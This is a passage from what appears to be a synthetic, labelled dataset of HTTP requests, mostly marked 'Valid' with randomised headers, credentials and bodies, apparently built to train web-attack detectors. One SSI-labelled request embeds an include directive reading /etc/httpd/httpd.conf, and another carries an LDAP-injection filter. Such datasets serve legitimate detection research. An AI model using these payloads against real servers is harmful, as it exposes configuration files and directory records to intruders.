Last-Modified: Fri, 07 Oct 05 09:25:28 UTC
Host: www.aatkeeens.biz
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: compress, gzip, identity, identity;q=0.9, identity
Accept-Language: siMi2reh-thnta5i;q=0.3
Cache-Control: no-transform
Client-ip: 180.159.10.206
Cookie: chgroUs1v=ke>inufas=;wowxTxRjE=~glneeszpaqee;ssttYs=426197
Cookie2: $Version="2"
Date: Sun, 12 Oct 08 09:51:07 GMT
ETag: W/"a_P_.ceqKKH6kOr8J"
Expect: 100-continue
From: aleOu@hlmCevz4na.org
If-Modified-Since: Tue, 02 Mar 10 04:04:02 CET
If-Unmodified-Since: Tue, 01 May 07 20:07:19 GMT
If-Match: *
If-None-Match: "dehlTL@E-7uMZSOV"
If-Range: "4SvR_YhE2JOozr1"
Max-Forwards: 239
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Eirtt hmefn=eehsteiw
Authorization: NTLM dG5paXV6RWVFTnR0dnluaHRyZW9odG5vUmZodHNybmx2d2V6VWI=
Range: -4
Referer: http://www.inbhh.uk/aboadpo/g5Ttsa2l/chn7h/in7yepei/sxeasl.dll
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/9.4 (compatible; x18wtt; Win 9x; tseiroe; aiohaweetl; Eetusin)
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2511
Via: 4.3 34.62.134.157, 2.9 36.12.162.36, FTP/7.2 www.prefae.png
Transfer-Encoding: compress
Upgrade: rdt/2.6, bbnoh/3.2, 1lceaS/9.8
Warning: 924 www.rtAils.htm:75 "ahvM8nsnku" 
X-Forwarded-For: 51.142.208.191
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oqaHexNir=83053&sE9owzbrndam=009337&eNlpvtS=1tanhteegaeeordidn&WIinputAh=becat/p&ntx2z=r2JGj2TqnfAk&7hHB=ItbsLaefrdnrpieroo&iuso=4605467&pssHesCRmrsne=/e&rSeee4tsvoynah=tniin4uh&MH4oI=fEoeNrtatglgsa

End - Id: 7284
Start - Id: 23082
class: Valid
GET /wRUEtwO@wL@R.tiff?8Scn8nm=58996410&tera=h1c%40&Castoua7oiaeier=0048548561&23=tie HTTP/1.1
Host: www.cnmdaiaasm.fr:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1254;q=0.5
Accept-Encoding: compress
Accept-Language: lopatn-peteegi;q=0.0, rar-en, aaais-ln0glb5i;q=0.3
Cache-Control: max-stale
Client-ip: 109.191.160.78
Cookie: otld2Ihs=:sandy;SWAD=e2oesfier7ma3aly;4dHidie7nfctdr=cgcjMV1@;Woo0ya=r]co;tc062aseit3b1= tef+utsorna=ano;kousissDlnlt=e )84tIechol+aohee:z
Cookie2: $Version="97"
Date: Mon, 02 Apr 07 17:01:20 GMT
ETag: W/"6jU3qjmRU9Gu.70"
Expect: 100-continue
From: 62uiI@nmaDo.it
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Tue, 04 Nov 08 22:20:56 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 May 08 14:03:40 UTC
Max-Forwards: 1728
MIME-Version: 2.8
Pragma: ht0='D'
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: Digest algorithm=ituf8uNo
Range: 411788-,-919885,19-6
Referer: http://www.aeyKToe.gov/necdie/Ae3twk/a5l1/Gibrtena/6aijcusO.tiff
TE: gzip;q=0.7,gzip;q=0.3,chunked;q=0.1
Trailer: Authorization
User-Agent: tavIesi
UA-CPU: MIPS
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: HTTP/1.1 www.eosPpnNt.html, 6.4 www.llXny.js, 4.5 www.rtHlD.png
Transfer-Encoding: identity
Upgrade: prlHv/9.3, doutme/0.7, 0ng/5.1, sapxte/1.0, gee/6.5
Warning: 928 79.197.115.34 "thIpvU9anr5wv2of" 
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23082
Start - Id: 4560
class: Valid
PUT /2sqiumbaa1cnauhrnekn/evJQtstdin1Jb5/rYKsTNoe./irvdy/1tJpotcytjassqr71ei/nOq70/u%uinsert59perl8@_.nsf? HTTP/1.1
Content-Length: 65
Content-Language: 7to,Srsrr,4
Content-Encoding: compress
Content-Location: /0IdSj/eeoeth.mp3
Content-MD5: cm9lcml3NmhoWTJsZGpybw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Mar 08 06:37:21 GMT
Last-Modified: Wed, 09 Jul 08 06:17:09 GMT
Host: www.fjir.org
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate, identity;q=0.4, deflate
Accept-Language: rhct3p-nifet;q=0.4
Cache-Control: only-if-cached
Client-ip: 168.83.155.128
Cookie: oxcaikartved=e9;G3elx=4eopxjtena3a;test7Qso=661832;MgtsjDclhi2s5=fiE
Cookie2: $Version="6"
Date: Tue, 20 Sep 05 20:19:48 GMT
ETag: "xLyaQ.3agzdd7R3i82dq"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Sun, 18 Jan 09 20:04:21 CET
If-Unmodified-Since: Tue, 22 Nov 05 02:51:30 UTC
If-Match: "zg.tS4WdMrOK9Ik"
If-None-Match: "sh81O.O5K4oWuKX"
If-Range: Wed, 27 May 09 01:02:35 UTC
Max-Forwards: 1283
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: 6nhni opcl=Neatehet
Range: 5-7
Referer: /oafrfaet.doc
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 0.3; 6i-dn; rv:0.1.6) Gecko/11244488
UA-CPU: MIPS
UA-Disp: 067,349,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: gzip
Upgrade: y3ba/9.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
X-Forwarded-For: 41.244.54.15
X-Serial-Number: 8388631449289131034
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pohuInKLmazESn=514551473&cXmOv877x_G=asFrAIatar&zSPRaJZUp=inputTr

End - Id: 4560
Start - Id: 31323
class: Valid
GET /6SBu/dea/hutqueewbegmruEdrf/lfyeP..a5..Y9p5_BSG/sTgfK9T/ekPqz3ni7Az.exe? HTTP/1.0
Host: www.ozqid7.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.4, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 161.123.214.209
Cookie: zsp8tntiscvoi=nPortgniwtOmtsll9exec;Best=ncvuithmo7;tiit8oErE=le4m
Cookie2: $Version="563"
Date: Wed, 29 Mar 06 23:43:30 CET
ETag: W/"itaj-LM3X92JM4r"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 08 Jan 10 09:29:06 UTC
If-Unmodified-Since: Sat, 31 Jan 04 13:58:45 GMT
If-Match: *
If-None-Match: "v._iKkL-KBVPaD8aaDU9"
If-Range: Sat, 22 Nov 08 03:49:06 CET
Max-Forwards: 22
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: -388719
Referer: /osalntu8/qrkh.png
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (compatible; Konqueror/3.7; Solaris; hmpp)
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5304x185
Via: 3.3 130.242.71.109:3, FTP/9.9 www.w1exahr.shtml, lxpis/0.7 110.30.225.53
Transfer-Encoding: compress
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 90.60.198.91
X-Serial-Number: 76735229395499245344
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31323
Start - Id: 15066
class: Valid
GET /6oanSre7s4sg2e/r1CanTD.swf?eohthm=eosh&seesaetsipeDt=w HTTP/1.0
Host: 181.16.55.247
Connection: keep-alive
Accept: application/*, text/plain;q=0.6
Accept-Charset: iso-8859-5;q=0.1, x-mac-chinesesimp;q=0.0, big5;q=0.1, iso-8859-4
Accept-Encoding: *
Accept-Language: 4-ye3utsa, isiEamnE-5iei;q=0.4, oaommi-xe;q=0.7, ywld-ht
Cache-Control: only-if-cached
Client-ip: 75.52.136.223
Cookie: eZshcn=99;iIuC8sE=jWpdu
Cookie2: $Version="81"
Date: Tue, 20 Jul 04 09:02:45 CET
ETag: W/"BPURqs9TynV9AREMCpZ"
Expect: 100-continue
From: shdojh@32thstuem.biz
If-Modified-Since: Sat, 01 Dec 07 12:25:20 CET
If-Unmodified-Since: Mon, 01 Feb 10 13:37:30 CET
If-Match: *
If-None-Match: *
If-Range: "E3zl3NqVQCj3PQJg"
Max-Forwards: 3
MIME-Version: 2.9
Pragma: te7='ndkkte'
Proxy-Authorization: Digest response="a5e6c9C505B71e1cDdCFdCdB3aF006A7"
Authorization: Basic b3dybzhtdGk6dGVlaWJn
Range: 3-,-95,-866073
Referer: http://www.bsmsu.biz/ygdts/qrdn/urCi7l7w/ftvetOse/owlwe.exe
TE: gzip,deflate
Trailer: Max-Forwards
User-Agent: d26omiOb (rewyVU; yiz2c8.d0q)
UA-CPU: MIPS
UA-Disp: 3763,8529,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 656x086
Via: 8.2 www.ndea5o.jpg, FTP/4.4 www.t0rXm.shtml:3, 8.9 247.125.88.250
Transfer-Encoding: identity
Upgrade: ueemt/7.4, bah/0.8, rta/2.0, rbaf/1.3, siueo/2.5
Warning: 352 176.101.245.85 "VhmtzhedooeenorYir" "Tue, 05 Apr 05 11:56:04 CET"
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15066
Start - Id: 39651
class: SSI
GET /9ya/tdoeneir0a/x-IuxGFQaW.l5hw/4iessieg/erIoeihu6lTtcaitomi3/ap2_1fFfklKgoNozSc3C/ceeANqat6shhsnbkn/-FbmWj/Ftay.shtml?nresegs=9BG2kL&dhp=x44dnoilohsloaye&teotreEitbn=rdoupdateotdir2&boot.inidocumentpassthruGhtmp6I1@=35994&se2cbina8dpist=t7x&zcan=gE9JVE3YP&wJwEUuteh=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E HTTP/1.0
Host: 15.61.149.240
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, x-mac-ce;q=0.1, euc-cn
Accept-Encoding: compress, gzip;q=0.2, gzip;q=0.6, gzip;q=0.0
Accept-Language: tnvdeyas-amvpm;q=0.2, cEd9rp-Rao
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="185"
Date: Sat, 06 Oct 07 20:41:56 CET
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Wed, 18 Oct 06 15:51:51 GMT
If-Unmodified-Since: Sat, 19 Apr 08 16:35:51 CET
If-Match: *
If-None-Match: "aI2_v0pUz3MLYh0SS"
If-Range: *
Max-Forwards: 863
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /54oieuaa/lyaNto/unxatn/Heoirn.jsp
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/0.9 (Windows; U; Win98 7.2; tj-mc; rv:5.8.5) Gecko/45348695
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 587x0700
Via: 5.0 124.199.12.168, 5.2 www.lipethls.tiff, 2.7 118.27.134.107
Transfer-Encoding: aetp
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39651
Start - Id: 25343
class: Valid
GET /t3eeli0s/h4ubHSDdW62ONPJPFSZB/en9Aetarc/cpItlptody/inohPcDCg9ds/3EbgsoundwinntDkaKW4SFbJF/hKlena8JHT/cR1E2p2G/plDynabdTeTmio.dll?kBqUH=t%26ctqayo&mnyEhei=ereat+ectb&niisaFno7Om6lo=8628196&f0QHAOeT.v0=%7E&nEiq=o9ls+A9&HRulogIcWbZPlog=Ege&lo=380680711&teysexer6n=eee9daxnwe9reoonss&ue=50&ngnsoqbdS9xnn=eSzxR3kM_&n2Ll=lMy HTTP/1.1
Host: www.lepwo.com:28
Connection: slptrRee
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: tu-s, jItwan-ng2n3w;q=0.2, tnksRrf-atieah;q=0.8
Cache-Control: no-store
Client-ip: 57.251.164.85
Cookie: adwsoaniihnxas=[Nob9ugm];oavrt= allgesr>;eonelytu=ysen
Cookie2: $Version="014"
Date: Tue, 10 Aug 04 12:51:58 CET
ETag: W/"Lu@0SAFVopAC9ECD"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Thu, 01 Feb 07 06:55:52 GMT
If-Match: "BNRSV8BoV.hRKhzXY"
If-None-Match: *
If-Range: Tue, 08 Nov 05 07:48:44 GMT
Max-Forwards: 5
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic YXhhZjplaWliblQ=
Authorization: Basic ZHdyZXpzOjc3ZGRvdGVp
Range: -5,9601-,-779
Referer: /fvsnphea/ehhid7e/7cny.txt
TE: gzip
Trailer: Connection
User-Agent: Mozilla/5.5 (Windows; U; WinNT 5.7; ds-zo; rv:0.2.2) Gecko/41814719
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: gzip
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25343
Start - Id: 34681
class: Valid
PUT /L2Neik/PibjFFJ3/r@.G2i5tbc/qBdjPvdFgmA/hrCT4/AVsystemacceptp/Zs/E7cmdehp5@eLxZc@/hrlir/acceptvopenG/ge0EcW9uA_IsBV/rcmHx9lP25geF9yf.mspx? HTTP/1.0
Content-Length: 116
Content-Language: i3oteua,etlsvCtc
Content-Encoding: identity
Content-Location: http://www.inroeln.com/h2Heehs.gif
Content-MD5: b2VyaWJobXVhOEJwbnZvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Sep 08 23:02:32 GMT
Last-Modified: Sun, 06 Aug 06 24:38:46 CET
Host: www.scOlo.biz:80
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tctt-an5mzf0
Cache-Control: no-store
Client-ip: 138.28.225.214
Cookie: atfd8J8wopwv5=808811
Cookie2: $Version="7"
Date: Sat, 10 Feb 07 07:59:48 GMT
ETag: "-z7cDaqJyeTCA5bCl"
Expect: 100-continue
From: atv1Rae@ittstrm.org
If-Modified-Since: Tue, 02 Dec 08 09:10:47 CET
If-Unmodified-Since: Sun, 06 Aug 06 23:53:31 CET
If-Match: "3fm1EDxVVhxbQ8vI"
If-None-Match: "msnWd46t1oVbH-jRZuj"
If-Range: "0ur6spCnYPb5n9DI3f"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM TmlpbHlyMWNpY3dwb2NiZmtHb2kxZWJpY2V0bW90ZGRpaWFyaGhicm9l
Authorization: Basic cm5lZmE6MXRlZUVM
Range: -08
Referer: http://suce.uk/fsnasseg/nAckui.asp
TE: trailers,deflate
Trailer: Warning
User-Agent: oHjs0QhCb_ http://www.oteo.st
UA-CPU: MIPS
UA-Disp: 081,3578,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0894x8053
Via: HTTP/9.0 www.coTy.jpeg, 3.8 238.124.238.43, 7.4 171.152.240.148
Transfer-Encoding: gzip
Upgrade: nq8o/9.4, hsea/1.7
Warning: 912 www.vEtlJzei.png "hmbt4d6C" "Tue, 20 Sep 05 24:39:51 GMT"
X-Forwarded-For: 180.150.65.176
X-Serial-Number: 30358
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Rxn=98&gret=php5&zhraeMaingi1=%sel4&alko=5407992655&yt3RusoIl2ryn=37&yndo9pdddoa=hCfcrn&t4wedetagltiaBr=124&eo=@

End - Id: 34681
Start - Id: 8053
class: Valid
PUT /mxIsu54@LTlc/lusr7O1VC.aEZJ/i1tt/KCUSaV9Q.JVxy/JhttpVnetcat.tiff? HTTP/1.0
Content-Length: 275
Content-Language: s,GnytSfk
Content-Encoding: gzip
Content-Location: /KtuS/ayguiff.tiff
Content-MD5: dmdvaWc3b2xsYWFsY2ViaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Dec 05 21:42:55 UTC
Last-Modified: Sat, 31 May 08 22:57:38 CET
Host: www.iedxfa.biz:9
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-kr, windows-1258;q=0.0
Accept-Encoding: *
Accept-Language: owEha-6;q=0.8, as-xoKt;q=0.7, Ecu-hnaeu;q=0.5, qe60hcmt-mg;q=0.6
Cache-Control: no-transform
Client-ip: 194.216.252.85
Cookie: ahnep=mO;T;uws4exi1e45=rVYo;mi8akiriotDv9nH=nesithhaq;0O=wrmS N;fljs=cd0rcpD6;iaPno=ioAselectarshutdownaoatmp%jae
Cookie2: $Version="85"
Date: Tue, 12 May 09 03:53:39 CET
Expect: fetnagrt=AsLiib
If-Unmodified-Since: Thu, 06 Nov 08 03:26:28 CET
If-None-Match: *
If-Range: Mon, 09 Mar 09 20:44:18 CET
Pragma: uwe='nw4huee'
Proxy-Authorization: Digest realm
Referer: /eatf6eu/atRe.nsf
User-Agent: lhr1iltuD (efCegT; hS.2TzoWH; nquGquFf; enQFdEYvq)
Via: 1.2 212.52.4.157, eas2at/7.8 176.234.254.30:9658, 9.8 www.3Wisxce2.tiff
Transfer-Encoding: identity
Warning: 862 www.opdg.html "ruaa" 
X-Forwarded-For: 101.215.111.0

roige=tWr7fx6wdb_&inyNmstn8adgrr=8237749&paT=2542&hnnuenra8EyMeg=436&stvnh=ue9d&En1ten91i=1&5tZIKLdbSl=rv-u%2Fnph-sslsn4%7Eo+ef&msenralsm=necmde%2Bathtrrm&xp_oKJQ%uv=MeDlmytypoihkohoE&aundrNd1=34668994&vsy=441635&0nffeiaoa9me=d385nFKylX&aT0sntcSw=euoome&0ty=a4keraw1ehhUs9tt4

End - Id: 8053
Start - Id: 45178
class: PathTransversal
GET ////? HTTP/1.1
Host: www.lhe1le.de:4
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Tue, 13 Sep 05 06:22:23 UTC
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: 100-continue
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Sat, 18 Feb 06 20:05:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0217
MIME-Version: 0.7
Pragma: lfiEn=lwe
Proxy-Authorization: Digest nonce
Authorization: Digest nc=9B7EA0Cc
Range: 551-3881,-846
Referer: /1ien4t.asmx
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: eeiCib/0.9.5.7.2
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: yturh/4.5 www.h1deam.tiff, 1.7 30.81.67.141, 4.8 248.91.215.10
Transfer-Encoding: identity
Upgrade: 09T/5.5
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 129.187.101.194
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45178
Start - Id: 34774
class: Valid
PUT /ewdl/hrNQQc.js? HTTP/1.0
Content-Length: 267
Content-Language: trasAmh,nDs6ly,7
Content-Encoding: identity
Content-Location: http://oaeb.uk/ni9otahf/leh9to/lr3lo.jpeg
Content-MD5: YTBsMGJzbm9oZXd5cG9scw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Oct 09 09:08:02 GMT
Last-Modified: Fri, 03 Dec 04 09:51:35 GMT
Host: 34.101.32.61
Connection: close
Accept: */*;q=0.0
Accept-Charset: big5;q=0.0, windows-1250, iso-10646-ucs-2;q=0.9, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: h-itMoGt, tktthl-c;q=0.5, lSea-i4s, 0tlt4feu-7iAossed;q=0.0, na0-0mm;q=0.4
Cache-Control: only-if-cached
Client-ip: 100.1.231.182
Cookie: b5N9mge=oHxtee9s3;g9Hfzs=nAP@s_;0jtpto7i=is34Us;pnLtpeqaBgweji=tolEtrsemdn1bels
Cookie2: $Version="6"
Date: Thu, 15 Mar 07 11:10:16 CET
ETag: W/"qy9RGYQYU@vXKZIJ2hvz"
Expect: rnuaet
From: 4nxqdb@y0cwsr.uk
If-Modified-Since: Thu, 16 Apr 09 13:27:41 UTC
If-Unmodified-Since: Mon, 19 Oct 09 10:32:01 UTC
If-Match: "N8PIPLjQZU1FRaFS@T"
If-None-Match: "J8RPge7vsKnwIZ2G3U1S"
If-Range: *
Max-Forwards: 0024
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM d2l0aW9zYm9xbW9sbW1tMHVmc3V0c2VlYXJzZmUzbGhvYU5zMmlkbmV6YWdh
Range: -904
Referer: http://www.lbnErn.org/7attAi/rsaaa/hsmLcarr/cSee9.asp
TE: gzip,gzip
Trailer: Range
User-Agent: Mozilla/1.7 (X11; U; Solaris 7.2; be-mm; rv:9.9.8) Gecko/92386946
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 262x4505
Via: 3.5 www.anee.gif, FTP/4.5 www.aoijhTsn.tiff
Transfer-Encoding: identity
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sedab6ryo=757&at22EN@NUW=5&tohwyjvssniahrs=hyun0end8AWrttwe&ele=3amMet:&IYptdotiScdah=hul@&ljtti=sou&5hraeetY=htsEedcdwinntk&usele=bsm|afmo)m&IeAn4rnurnI=Fatst&jwsEtkaraed=elcz&xc=pbe&sttooteUxmuer=8257&8SGaYbi-3Xlsg=8904449&7MNd=e..5id-&DvmNk3f0dJl6=27375619

End - Id: 34774
Start - Id: 37191
class: LdapInjection
GET /in-CQhz2/tN/vuiubsniersrw/AHeMuYXhtpassBVh/KJ@cmdqDi.cfm?8P8cLqaF=%29+++%28++++%7C+%28displayName%3Dhad*%29++%28name++%3D+++had*++%29%28mail%3Dhad*%29&5tesY=i.B9&4e=i+8documentDi&stfEolmp13=0eger8oI0ir&nign=8252399 HTTP/1.1
Host: www.4bocmeiri.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: arD=mieollIt
Client-ip: 129.219.81.71
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="524"
Date: Wed, 12 Dec 07 16:26:05 CET
ETag: "gWkihjapRYwi3oCzZ"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Sun, 29 Nov 09 20:31:08 GMT
If-Unmodified-Since: Fri, 07 Nov 08 13:39:07 UTC
If-Match: "2bdAEexNEHPvlxW"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 57
MIME-Version: 6.5
Pragma: no-cache
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: http://ascv.gov/leau.js
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/2.9 (Windows; U; Win98 9.1; pb-eu; rv:9.2.5) Gecko/92033135
Via: 2Irhs/1.2 92.36.242.48:85
Transfer-Encoding: 4ndit; rnatwo=rfRh5se
Upgrade: resPct/8.2
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37191
Start - Id: 1243
class: Valid
GET /8cvHlzPo9I45nxTQ7SIZ/aozTeo5tdibt3lrufa/basdwa9vitonnhowleb/hxDSyscriptcopyV/itrhiffatsnawseu/8IO2B02uEnG_2t/LP1.mdb?Sklaegntevhuo=561&iTVhps4edoi0n=09850276&W-nuXRm=tlosma9nmo8mso&ael8p0ndo=sbeawoleznaaeh&iPrcpdl8=%3A+&Thoayz=ibsrtetm&denuevueszlu=015 HTTP/1.0
Host: www.hsuOacjjlh.ch
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: iso-8859-6;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=1063
Client-ip: 100.37.156.126
Cookie: sq7eyH9=pfuyutst;fT=t mq
Cookie2: $Version="955"
Date: Fri, 13 May 05 20:39:13 UTC
ETag: W/"peAJSBN4O_8DDBsCp"
Expect: tiatbiuf
From: rrss18n@ElE01poue.cz
If-Modified-Since: Tue, 04 Jul 06 10:26:30 CET
If-Unmodified-Since: Thu, 10 Mar 05 01:40:07 UTC
If-Match: "ytgsIAutUUcFLaV"
If-None-Match: "Ah3SlqO8M@n3LXjKFCYp"
If-Range: Thu, 08 May 08 18:32:48 UTC
Max-Forwards: 324
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM eWluaWV0ZW41a3dubjVydG9jZTFUclRpdml5Nm5lczJ1bzJhcEJlMG9lbzk5YWs=
Range: -709
Referer: http://eiem.gov/enqs.shtml
TE: chunked;q=0.9,trailers
Trailer: If-Match
User-Agent: st1hesJea (ssbe__e.e)
UA-CPU: StrongARM
UA-Disp: 092,1496,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6040x9780
Via: atsIr/4.7 104.34.36.100, HTTP/9.2 www.rv8kA.shtml:683
Transfer-Encoding: gzip
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 404 53.90.28.184 "aierEmnw2ea" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 5267293747138696833
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1243
Start - Id: 21329
class: Valid
GET /VxymV5nR5Yf/eswy5keTxN3nsw/zhfcbR0vR2B35UM/yEtrevhlohnOmLpTo6/o./nuyliav/451/tsh7Swdi88rl9rnnE/AeeoaWtTaIAencrttl/eXUMuz/nMDR65aMnBSGZTQ.html?ebsso=74 HTTP/1.1
Host: 0.20.174.145:03
Connection: keep-alive
Accept: application/rtf;q=0.9, audio/*;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.2, windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3395
Client-ip: 107.104.243.184
Cookie: sdaedrh0precsN=<87
Cookie2: $Version="158"
Date: Fri, 28 Aug 09 24:28:20 GMT
ETag: W/"_JgP_hIeE0JkXWG"
Expect: 8iUsren
From: rd1eArm@0dui5ee.biz
If-Modified-Since: Sat, 19 Aug 06 04:28:58 GMT
If-Unmodified-Since: Sun, 29 Aug 04 12:57:37 GMT
If-Match: "ZMeIPj8b2KrrbYNAx"
If-None-Match: "nJ-NiIjOG14uK-iu4XN"
If-Range: Sun, 17 Feb 08 10:26:39 GMT
Max-Forwards: 98
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic ZXN5VGE6b2lhcnFzZQ==
Authorization: Droes Emt9iipo=tnedvn
